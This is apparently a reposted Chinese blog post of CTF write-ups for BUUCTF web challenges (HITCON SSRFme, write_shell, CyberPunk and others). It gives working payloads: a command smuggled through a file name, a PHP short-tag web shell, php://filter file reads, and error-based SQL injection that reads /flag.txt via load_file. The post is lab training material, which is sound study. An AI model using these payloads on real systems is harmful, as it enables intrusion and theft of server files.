返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >buuctf web题
  • 681
分享到

buuctf web题

web安全php 2023-09-03 17:09:27 681人浏览 独家记忆
摘要

[HITCON 2017]SSRFme 首先理清代码逻辑。 上边一部分是输出输出了一下$_SERVER[“REMOTE_ADDR”],然后以 sandbox/" . md5(“orange” . $_

[HITCON 2017]SSRFme

首先理清代码逻辑。
上边一部分是输出输出了一下$_SERVER[“REMOTE_ADDR”],然后以
sandbox/" . md5(“orange” . $_SERVER[“REMOTE_ADDR”])为路径创建目录。
之后就是将当前目录转到了创建的目录下。
目录可以直接计算出来,先计算一下目录。

PHP$a = "sandbox/" . md5("orange127.0.0.1");//127.0.0.1是示例echo $a;//创造的目录

shell_exec函数比较熟悉不用看,去看一下pathinfo。
在这里插入图片描述
在这里插入图片描述
过滤了点,防止了目录遍历,之后是file_put_contents写入文件。
先随便尝试一下。
?url=/&filename=feng
然后访问/sandbox/xxx/feng(xxx为自己脚本跑出的路径)
在这里插入图片描述
但直接去得到/flag的内容时无法成功,然后访问/readflag下载下来是一个乱码文件,应该是需要去执行readflag文件。
shell_exec函数支持file协议; 可以利用base -c "cmd"进行命令执行,先创建文件bash -c /readflag|。

?url=&filename=bash -c /readflag|

然后通过伪协议将读取flag再放入其他文件里。

?url=file:bash -c /readflag|&filename=feng

然后/sandbox/xxx/feng即可得到flag。

[watevrCTF-2019]Cookie Store

打开后发现flag需要用钱买,有题目可知,肯定是Cookie里存在钱的信息,看一下。
在这里插入图片描述
发现money直接明文储存在cookie里,并且买过东西的返回值也在cookie中,修改money买flag。
在这里插入图片描述
然后base64解码cookie,flag就在cookie里。
在这里插入图片描述

[红明谷CTF 2021]write_shell

还是简单的代码审计。
代码思路很容易理解,传入action时,输出创建的目录,然后如果是upload时,便会在该目录中写入一个index.php文件,然后对data进行了过滤。
<和=都没有被过滤,直接利用段标签绕过即可。
先访问

?action=pwd

然后便会看到创建的目录,之后我们再写入木马文件。
?action=upload&data=
访问目录。
在这里插入图片描述

?action=upload&data=<?=`cat%09/f*`?>

然后再访问即可得到flag。

[b01lers2020]Welcome to Earth

一顿乱找,再/fight提示的/static/js/fight.js文件里找到了flag信息。

// Run to scramble original flag//console.log(scramble(flag, action));function scramble(flag, key) {  for (var i = 0; i < key.length; i++) {    let n = key.charCodeAt(i) % flag.length;    let temp = flag[i];    flag[i] = flag[n];    flag[n] = temp;  }  return flag;}function check_action() {  var action = document.getElementById("action").value;  var flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"];  // TODO: unscramble function}

写个排列脚本即可。(直接自己用眼看也可)

from itertools import permutationsflag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]item = permutations(flag)for i in item:k = ''.join(list(i))if k.startswith('pctf{hey_boys') and k[-1] == '}':print(k)

在这里插入图片描述
不能理解这题有什么意思。

[GWCTF 2019]枯燥的抽奖

发现了check.php文件,发现是mt_rand生成的随机数,但存在漏洞。
mt_rand生成的是伪随机数:
所谓伪随机数,可以理解为可预测性的,生成伪随机数是线性的,例如:mt_rand()这个函数,如果知道他的分发seed种子,然后种子有了后,靠mt_rand()生成随机数。
我们知道了随机数的前十个,可与利用php_mt_seed*(PHP mt_rand()种子破解程序)工具来破解随机数。
下载网址:

php_mt_seed*下载地址

先用脚本将伪随机数转换成php_mt_seed可以识别的数据

str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'str2 = 'liG57uc3Ls'str3 = str1[::-1]res = ''for i in range(len(str2)):    for j in range(len(str1)):        if str2[i] == str1[j]:            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '            breakprint(res)

然后安装工具进行爆破。
在这里插入图片描述
然后破解出来了随机数,记得php版本,需要7.1以上的。

然后用脚本来得到需要的字符串

mt_srand(627353629);//爆破出来的随机数$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";$str='';$len1=20;for ( $i = 0; $i < $len1; $i++ ){    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       }echo "

".$str."

"
;

输入即可得到flag。

[NCTF2019]True XML cookbook

题目直接给了提示xml,发现登录框,找了个payload试了一下。
在这里插入图片描述
发现成功了,但是没有flag文件,常用的文件名都试过了,不行。
然后还差看了/etc/gpsts文件,但没发现什么。
在网上看到wp发现都是在/proc/net/arp,发现了内网信息。
然后就访问了内网。改了一下c字段。(但一直都没实现成功,先放到这吧)

[CISCN2019 华北赛区 Day1 WEB5]CyberPunk

源码中发现了任意文件读取漏洞。
在这里插入图片描述

payload:

?file=php://filter/convert.base64-encode/resource=index.php

顺便把search.php、change.php、delete.php都读出来。
一个一个都看了一下,看着就像是sql注入,本来还以为是绕过,但发现过滤了很多,绕不过去,但在change.php中发现。

$address = addslashes($_POST["address"]);

address仅用了addslashes过滤,连正则都没用,那肯定是这里的问题。
发现只有信息报错的时候才会被打印出来,所以猜测是二次注入中的报错注入。
先用常规payload试一下,闭合前边然后修改user_id的内容,在闭合后边。

1'where user_id=extractvalue(1,concat(0x7e,(select user()),0x7e));#

在这里插入图片描述
找了好久都没有找到flag,无语。
在网上看到可以利用load_file来直接读取文件,但是flag.txt文件是直接猜出来的吗?
payload:

1'where user_id=extractvalue(1,concat(0x7e,(select (load_file('/flag.txt'))),0x7e));#

在这里插入图片描述
有长度限制,用substring输出后边的即可。
payload:

1'where user_id=extractvalue(1,concat(0x7e,(select substring(load_file('/flag.txt'),25,50)),0x7e));#

在这里插入图片描述
看到还有大佬,直接改address的数据。
payload:

',address=(select load_file('/flag.txt'));#

原理也挺简单,利用change.php中插入时,修改了address的值。
然后查询即可得到flag。
在这里插入图片描述

来源地址:https://blog.csdn.net/akxnxbshai/article/details/127448852

--结束END--

本文标题: buuctf web题

本文链接: https://lsjlt.com/news/392531.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • buuctf web题
    [HITCON 2017]SSRFme 首先理清代码逻辑。 上边一部分是输出输出了一下$_SERVER[“REMOTE_ADDR”],然后以 sandbox/" . md5(“orange” . $_...
    99+
    2023-09-03
    web安全 php
  • BUUCTF--Web篇详细wp
    BUUCTF--Web篇详细wp [极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[HCTF 2018]WarmUp[ACTF2020 新生赛]Include[AC...
    99+
    2023-09-03
    CTF BUUCTF Web php 解析wp
  • buuctf-web-[RoarCTF 2019]Easy Calc1
    打开环境 发现一个类似计算器的东西 尝试一些常规的测试参数 尝试单引号发现提示,但是并未报错,非sql注入 ...
    99+
    2023-09-22
    php Powered by 金山文档
  • BUUCTF web第三页WP
    文章目录 [极客大挑战 2019]RCE ME[MRCTF2020]套娃[WUSTCTF2020]颜值成绩查询[FBCTF2019]RCEService[Zer0pts2020]Can you...
    99+
    2023-09-12
    php web安全
  • BUUCTF——Basic题解
    文章目录 1. Linux Labs2. BUU LFI COURSE3. BUU CODE REVIEW 1. Linux Labs 打开靶机很茫然,什么也点不开 访问地址 根据题目提...
    99+
    2023-09-01
    php linux ctf web
  • BUUCTF-练习场-Web(5-8)
    [ACTF2020 新生赛]Exec 1 知识点 命令执行漏洞 | :  直接执行后面的语句 ||:    如果前面执行的语句出错,才执行后面的语句 &:    &前面后面的命令都要执行,无论真假 &&:如果前面为假就直接出...
    99+
    2023-10-04
    web安全 安全 php
  • BUUCTF-练习场-Web(1-4)
    [极客大挑战 2019]EasySQL 1 知识点: sql漏洞是把sql命令插入web表单或输入域名,页面的查询请求,达到欺骗服务器,实现诸如绕过登录,查询服务器内容等目的恶意sql命令sql注入的万能语句:' or 1=1# '...
    99+
    2023-09-01
    安全 web安全 计算机网络
  • BUUCTF-Web-[极客大挑战 2019]Upload
    打开后可以看到是一个可以进行文件上传的页面,如下图所示 查看页面源代码,如下图所示,可以看到有js代码,说明存在前端验证的可能性 上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片 用burpsuite进行抓...
    99+
    2023-10-07
    php 开发语言
  • BUUCTF-练习场-WEB-第一部分(8道)
    [极客大挑战 2019]EasySQL 1 payload:1' or 1=1# '是闭合前面的查询语句,or 1=1恒成立,可以使用or句子绕过判断,#用于注释,注释后面的内容不再执...
    99+
    2023-09-21
    安全 网络 Powered by 金山文档
  • BUUCTF[归纳]sql注入相关题目
    这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。 [0CTF 2016]piapiapia 我尝试了几种payload,发现有两种情况。 第一种:Invalid user name 第二种:Invalid us...
    99+
    2018-06-11
    BUUCTF[归纳]sql注入相关题目 数据库入门 数据库基础教程
  • 【BUUCTF刷题记录】[ACTF2020新生赛]Exec
    打开靶场,看到一个输入框,标题已经提示是command execution。 1. 首先输入111|ls 发现文件index.php   2. 打开文件index.php,构造payload:111|cat index.php,右击查看网...
    99+
    2023-09-13
    php 开发语言 web安全
  • BUUCTF [ZJCTF 2019]NiZhuanSiWei1
    涉及知识点: php代码审计;date://text/plain协议;filter 协议;反序列化;魔术方法  打开题目链接,是直接给出的php代码。 第一个if语句要求test不为空并且text内容为welcome to t...
    99+
    2023-10-06
    php java 开发语言 网络安全
  • [BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
    目录 题目链接: 题目解析: 得到flag: 题目链接: https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]SQL%E...
    99+
    2023-09-15
    php web安全 开发语言 sql
  • buuctf-AWD-测试1
    开启靶机之后看到有两个地址,然后上方的glzjin/123456应该是个用户名和密码。两个地址都访问看看,   在第一个地址中有点像是漏洞复现,第二个显示着ssh。第一个页面可以上传图片,先随便上传一个图片  发现个类似thinkphp...
    99+
    2023-09-03
    php 服务器
  • BUUCTF--BUU UPLOAD COURSE 1
    BUUCTF–BUU UPLOAD COURSE 1 一进入本题,我们先尝试上传文件,发现我们无论上传什么文件都会上传成功。我们尝试直接上传 shell.php 文件,上传成功,但在访问的时候发现: ...
    99+
    2023-09-22
    php 安全 web安全
  • BUUCTF-.htaccess-sql.fuzz-D盾
    第七周第一次 目录 WEB [MRCTF2020]你传你🐎呢 ​编辑 [极客大挑战 2019]HardSQL Crypto 萌萌哒的八戒 传统知识+古典密码 Misc 假如给我三天光明 后门查杀 WEB [MRCTF2...
    99+
    2023-09-11
    php 开发语言
  • web题型
    本文在别人的基础上对于一些地方做了一点补充 0X01 命令执行 漏洞原理 没有对用户输入的内容进行一定过滤直接传给shell_exec、system一类函数执行 看一个具体例子 cmd1|cmd2:无论cmd1是否执行成功,cmd2...
    99+
    2023-09-16
    网络安全
  • 【网络安全CTF】BUUCTF(Basic篇)
    Linux Labs 解题思路:已给用户名密码,直接用ssh工具连接即可获取flag 查找flag在跟下 提交完成。 BUU LFI COURSE 1 访问链接:为php代码审计题,看题目要求构...
    99+
    2023-08-31
    安全 web安全
  • 【BUUCTF之[MRCTF2020]你传你呢 1】
    [MRCTF2020]你传你🐎呢 咋说呢,题目名很顶😂。 开启靶机后,打开主页,发现就一个文件上传页面。 先上传一个正常的文件,发现错误。 我到这,我直接蚌埠住...
    99+
    2023-09-01
    php 安全 web安全
  • BUUCTF [极客大挑战 2019]BuyFlag1
    进入靶场,发现有另一个buyflag页面 告诉我们如果要买flag,必须是cuit的学生,必须有正确的密码,查看源码,发现密码已经告诉我们  这里涉及post传递两个参数money和password,is_numeric的绕过 和pas...
    99+
    2023-09-01
    网络安全 php
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作